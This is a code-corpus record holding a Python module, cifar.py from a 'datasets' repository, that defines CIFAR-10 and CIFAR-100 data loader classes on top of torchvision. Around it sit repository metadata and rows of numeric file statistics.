| 23.833333 | 38 | 0.867133 | 18 | 143 | 6.111111 | 0.611111 | 0.272727 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125874 | 143 | 5 | 39 | 28.6 | 0.88 | 0.20979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8a86a50879a358deccea4ea2988e65f3b8ea3192 | 3,600 | py | Python | cifar.py | jramapuram/datasets | 270e189393fedecb4e4df68ea59600e3005b67ec | [
"MIT"
] | 4 | 2020-07-28T08:47:31.000Z | 2021-03-24T08:33:58.000Z | cifar.py | jramapuram/datasets | 270e189393fedecb4e4df68ea59600e3005b67ec | [
"MIT"
] | 2 | 2020-12-24T04:08:42.000Z | 2021-05-12T13:00:01.000Z | cifar.py | jramapuram/datasets | 270e189393fedecb4e4df68ea59600e3005b67ec | [
"MIT"
] | 1 | 2018-07-24T08:52:01.000Z | 2018-07-24T08:52:01.000Z | import functools
from torchvision import datasets

from .abstract_dataset import AbstractLoader


class CIFAR10Loader(AbstractLoader):
    """Simple CIFAR10 loader, there is no validation set."""

    def __init__(self, path, batch_size, num_replicas=1,
                 train_sampler=None, test_sampler=None,
                 train_transform=None, train_target_transform=None,
                 test_transform=None, test_target_transform=None,
                 cuda=True, **kwargs):
        # Curry the train and test dataset generators.
        train_generator = functools.partial(datasets.CIFAR10, root=path, train=True, download=True)
        test_generator = functools.partial(datasets.CIFAR10, root=path, train=False, download=True)

        super(CIFAR10Loader, self).__init__(batch_size=batch_size,
                                            train_dataset_generator=train_generator,
                                            test_dataset_generator=test_generator,
                                            train_sampler=train_sampler,
                                            test_sampler=test_sampler,
                                            train_transform=train_transform,
                                            train_target_transform=train_target_transform,
                                            test_transform=test_transform,
                                            test_target_transform=test_target_transform,
                                            num_replicas=num_replicas, cuda=cuda, **kwargs)
        self.output_size = 10  # fixed
        self.loss_type = 'ce'  # fixed

        # grab a test sample to get the size
        test_img, _ = self.train_loader.__iter__().__next__()
        self.input_shape = list(test_img.size()[1:])
        print("derived image shape = ", self.input_shape)


class CIFAR100Loader(AbstractLoader):
    """Simple CIFAR100 loader, there is no validation set."""

    def __init__(self, path, batch_size, num_replicas=1,
                 train_sampler=None, test_sampler=None,
                 train_transform=None, train_target_transform=None,
                 test_transform=None, test_target_transform=None,
                 cuda=True, **kwargs):
        # Curry the train and test dataset generators.
        train_generator = functools.partial(datasets.CIFAR100, root=path, train=True, download=True)
        test_generator = functools.partial(datasets.CIFAR100, root=path, train=False, download=True)

        super(CIFAR100Loader, self).__init__(batch_size=batch_size,
                                             train_dataset_generator=train_generator,
                                             test_dataset_generator=test_generator,
                                             train_sampler=train_sampler,
                                             test_sampler=test_sampler,
                                             train_transform=train_transform,
                                             train_target_transform=train_target_transform,
                                             test_transform=test_transform,
                                             test_target_transform=test_target_transform,
                                             num_replicas=num_replicas, cuda=cuda, **kwargs)
        self.output_size = 100  # fixed
        self.loss_type = 'ce'  # fixed

        # grab a test sample to get the size
        test_img, _ = self.train_loader.__iter__().__next__()
        self.input_shape = list(test_img.size()[1:])
        print("derived image shape = ", self.input_shape)
 | 52.173913 | 100 | 0.565 | 345 | 3,600 | 5.533333 | 0.2 | 0.09429 | 0.06286 | 0.069146 | 0.891566 | 0.891566 | 0.891566 | 0.868518 | 0.839183 | 0.839183 | 0 | 0.014893 | 0.365833 | 3,600 | 68 | 101 | 52.941176 | 0.821288 | 0.079722 | 0 | 0.734694 | 0 | 0 | 0.014568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.061224 | 0 | 0.142857 | 0.040816 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7